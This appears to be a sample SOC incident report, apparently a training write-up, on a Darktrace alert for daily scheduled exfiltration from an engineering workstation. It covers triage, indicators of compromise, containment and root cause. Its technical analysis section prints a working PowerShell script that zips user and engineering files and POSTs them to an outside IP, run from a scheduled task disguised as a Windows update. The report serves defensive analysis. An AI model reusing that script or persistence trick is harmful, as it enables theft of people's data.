Darktrace Alert Details
Alert ID: DARKTRACE-SCHEDULED-EXFIL-1029-7842 Alert Time: 2024-03-02 16:30:45 EST Severity: HIGH (85/100) Source: Darktrace Enterprise Immune System Rule: “Regular Scheduled Data Transfer – Potential Exfiltration” MITRE ATT&CK: T1029 – Scheduled Transfer
Alert Details:
Detection: Regular, scheduled data transfers to external IP every 24 hours
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 185.143.221[.]89:443 Pattern: Daily at 04:00 AM (off-hours) Data Volume: 15-20 MB each transfer
Transfer History (from Darktrace model):
2024-02-28 04:00:15 – 16.2 MB transferred
2024-02-29 04:00:22 – 18.7 MB transferred
2024-03-01 04:00:18 – 15.9 MB transferred
2024-03-02 04:00:25 – 17.3 MB transferred (today)
Current Detection:
Time: 16:30 EST (alert based on pattern analysis)
Detected after 4 days of scheduled transfers
Scheduled Task Details (from EDR):
Task Name: “WindowsUpdateTask” (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script exfiltrating data
Detection Logic:
Regular transfers at same time daily (scheduled)
Off-hours execution (04:00 AM)
Consistent data volume (15-20 MB)
Destination IP known malicious
Pattern matches scheduled exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Darktrace alert
Darktrace Console
Confirmed scheduled exfiltration pattern
2. Process Investigation
Identify scheduled task
CrowdStrike Falcon
“WindowsUpdateTask” running PowerShell script
3. Script Analysis
Extract PowerShell script
CrowdStrike Live Response
Script collects and exfiltrates engineering data
4. Data Analysis
Determine what was stolen
File Audit Logs
~68 MB total exfiltrated over 4 days
5. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
6. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-159 Summary: T1029 – Scheduled Exfiltration of 68 MB Over 4 Days Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1029, scheduled-transfer, exfiltration, darktrace, compromised-account Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Regular Scheduled Data Transfer – Potential Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:443.
Pattern: Daily at 04:00 AM, 15-20 MB each.
Total: 68 MB over 4 days.
Time: 2024-03-02 16:30 EST.
Technique: MITRE ATT&CK T1029 – Scheduled Transfer.
2. Technical Analysis:
Attack Chain:
2024-02-28 – rpatel account compromised
2024-02-28 03:00 – Attacker creates scheduled task
2024-02-28 04:00 – First exfiltration (16.2 MB)
2024-02-29 04:00 – Second exfiltration (18.7 MB)
2024-03-01 04:00 – Third exfiltration (15.9 MB)
2024-03-02 04:00 – Fourth exfiltration (17.3 MB)
2024-03-02 16:30 – Darktrace detects pattern
Scheduled Task Details:
Name: WindowsUpdateTask (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script C:\Windows\Tasks\update.ps1
Run As: SYSTEM
PowerShell Script:
$files = @(
“C:\Users\rpatel\Documents\ProjectX\*.*”,
“C:\Users\rpatel\Desktop\*.docx”,
“C:\engineering_data\*.*”
)
$zip = “C:\Windows\Temp\data.zip”
Compress-Archive -Path $files -DestinationPath $zip
$bytes = [System.IO.File]::ReadAllBytes($zip)
$b64 = [System.Convert]::ToBase64String($bytes)
$body = @{data=$b64} | ConvertTo-Json
Invoke-WebRequest -Uri https://185.143.221[.]89/upload -Method POST -Body $body
Remove-Item $zip
Total Data Exfiltrated (68 MB):
ProjectX source code (28 MB)
Engineering designs (22 MB)
Project documentation (12 MB)
Personal notes (6 MB)
3. Investigation Findings:
Timeline:
02-28 03:00 – Task created
02-28 04:00 – Day 1 exfiltration
02-29 04:00 – Day 2 exfiltration
03-01 04:00 – Day 3 exfiltration
03-02 04:00 – Day 4 exfiltration
03-02 16:30 – Darktrace alert
03-02 16:32 – SOC investigates
03-02 16:33 – Host isolated
03-02 16:34 – Scheduled task disabled
Indicators of Compromise (IoCs):
Scheduled Task:
– “WindowsUpdateTask”
– Action: C:\Windows\Tasks\update.ps1
Files:
– C:\Windows\Tasks\update.ps1 (SHA256: a1b2c3d4…)
Network:
– Destination: 185.143.221[.]89:443
– Pattern: 15-20 MB daily at 04:00 AM
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Disabled scheduled task.
Deleted PowerShell script.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (68 MB over 4 days).
Notified affected data owners.
Initiated breach response.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to scheduled exfiltration.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Scheduled task not monitored.
Off-hours transfers not detected for 4 days.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 68 MB of engineering IP exfiltrated over 4 days.
Financial Impact: Significant (IP theft, incident response).
7. Remediation & Prevention:
Completed Actions:
Scheduled exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for scheduled tasks.
Created alert for off-hours data transfers.
8. Conclusion:
An attacker compromised an engineering account and created a scheduled task that exfiltrated 68 MB of intellectual property over 4 days, operating daily at 04:00 AM to evade detection. Darktrace detected the pattern after 4 days, enabling containment.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-02 17:30 EST